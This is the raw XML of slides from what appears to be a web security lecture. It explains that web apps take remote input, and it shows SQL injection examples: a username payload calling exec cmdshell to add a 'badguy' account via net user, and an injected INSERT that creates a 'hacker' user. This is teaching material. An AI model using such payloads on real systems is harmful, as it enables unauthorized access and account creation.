          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Takes input from remote users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30BAFE22-399D-5242-BB5D-2672B9DEEB79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4286946" y="2807133"/>
            <a:ext cx="428040" cy="757800"/>
            <a:chOff x="4286946" y="3412440"/>
            <a:chExt cx="428040" cy="75780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2AFF57F-C526-4C4C-A04E-7A7C1E56605A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4286946" y="3412440"/>
                <a:ext cx="335520" cy="757800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02AFF57F-C526-4C4C-A04E-7A7C1E56605A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4268946" y="3394800"/>
                  <a:ext cx="37116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67734AB0-9EF3-9549-9365-A845075535EA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4607706" y="3898440"/>
                <a:ext cx="107280" cy="219960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Ink 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67734AB0-9EF3-9549-9365-A845075535EA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4590066" y="3880800"/>
                  <a:ext cx="142920" cy="255600"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA7F575C-8B2B-A049-90CB-9F331E663A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6287466" y="2703453"/>
            <a:ext cx="587160" cy="885600"/>
            <a:chOff x="6287466" y="3308760"/>
            <a:chExt cx="587160" cy="88560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E378C41-7715-F941-9489-14566F4588E7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6287466" y="3308760"/>
                <a:ext cx="587160" cy="885600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE378C41-7715-F941-9489-14566F4588E7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6269826" y="3290760"/>
                  <a:ext cx="622800" cy="92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6657A86-4F3A-3244-9744-E24ECB7ED4AE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6358386" y="4092840"/>
                <a:ext cx="140040" cy="84960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6657A86-4F3A-3244-9744-E24ECB7ED4AE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6340746" y="4074840"/>
                  <a:ext cx="175680" cy="120600"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F493EE-C5EE-D242-AA26-B64E3B19BB62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8675119" y="993688"/>
            <a:ext cx="3153602" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Interacts with back-end databases and other servers providing third-party content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC08316-0FC8-1A48-A11C-F487B36D9589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9700986" y="2117013"/>
            <a:ext cx="242640" cy="1528560"/>
            <a:chOff x="9700986" y="2722320"/>
            <a:chExt cx="242640" cy="152856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09C84989-4102-AD4A-BEE3-C37695D591CE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9700986" y="2722320"/>
                <a:ext cx="236880" cy="1528560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09C84989-4102-AD4A-BEE3-C37695D591CE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9683346" y="2704320"/>
                  <a:ext cx="272520" cy="156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11D37001-FD51-8C46-91F3-20019F7A37F8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9786666" y="4089600"/>
                <a:ext cx="156960" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11D37001-FD51-8C46-91F3-20019F7A37F8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9769026" y="4071960"/>
                  <a:ext cx="192600" cy="191520"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F0B1B2-2DB5-134D-8B36-730365E85435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092648" y="5277074"/>
            <a:ext cx="7077272" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Dynamically generates and outputs HTML for users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Content from many different sources, often including users themselves (social networks, photo sharing, blogs…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4B29159-8826-624F-9283-CAC5D66BEF57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3596826" y="4610880"/>
            <a:ext cx="455040" cy="640080"/>
            <a:chOff x="3596826" y="4610880"/>
            <a:chExt cx="455040" cy="640080"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId22">
              <p14:nvContentPartPr>
                <p14:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C347C05-55B3-0740-889D-CFF1AFD4001B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3596826" y="4610880"/>
                <a:ext cx="366480" cy="640080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C347C05-55B3-0740-889D-CFF1AFD4001B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3578826" y="4592880"/>
                  <a:ext cx="40212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B9CE67DD-A835-1D4A-B13D-7B7A44FDA0E4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3957186" y="4651200"/>
                <a:ext cx="94680" cy="110160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="27" name="Ink 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9CE67DD-A835-1D4A-B13D-7B7A44FDA0E4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId25"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3939186" y="4633560"/>
                  <a:ext cx="130320" cy="145800"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7067ECC0-2CB0-BE42-AB9F-8A336EDA0E0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7705523" y="4636811"/>
            <a:ext cx="1030645" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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52" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E75F672-E3CA-FC49-85D9-D08821BA2FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7705523" y="4836431"/>
            <a:ext cx="966250"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lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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9EE900AF-1B40-014D-BCE7-9C7E6CA8B186}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7333323" y="5925407"/>
              <a:ext cx="1658619" cy="113666"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="Ink 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE900AF-1B40-014D-BCE7-9C7E6CA8B186}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7225677" y="5817154"/>
                <a:ext cx="1874272" cy="329812"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353848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346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6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46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46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28" grpId="0" animBg="1"/>
      <p:bldP spid="1434630" grpId="0"/>
      <p:bldP spid="1434631" grpId="0" animBg="1"/>
      <p:bldP spid="1434632" grpId="0"/>
      <p:bldP spid="35856" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="5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03DCE44A-D26A-134C-B56C-D8696A9C969A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Can Execute Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEBE743-837D-0747-BB20-845D54AA6D62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User gives username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   ′ exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ‘net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ / ADD --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Web server executes query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=execute(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        username= ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ exec … --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Creates an account for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> on DB server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12376906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37184EE-8B04-4840-9A30-55013DC9D99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Can Modify Critical Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD733F01-640D-954D-AD8C-70B49EADAE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Create new users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 	’; INSERT INTO USERS (‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd’,‘salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   VALUES (‘hacker’,‘38a74f’, 3234);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
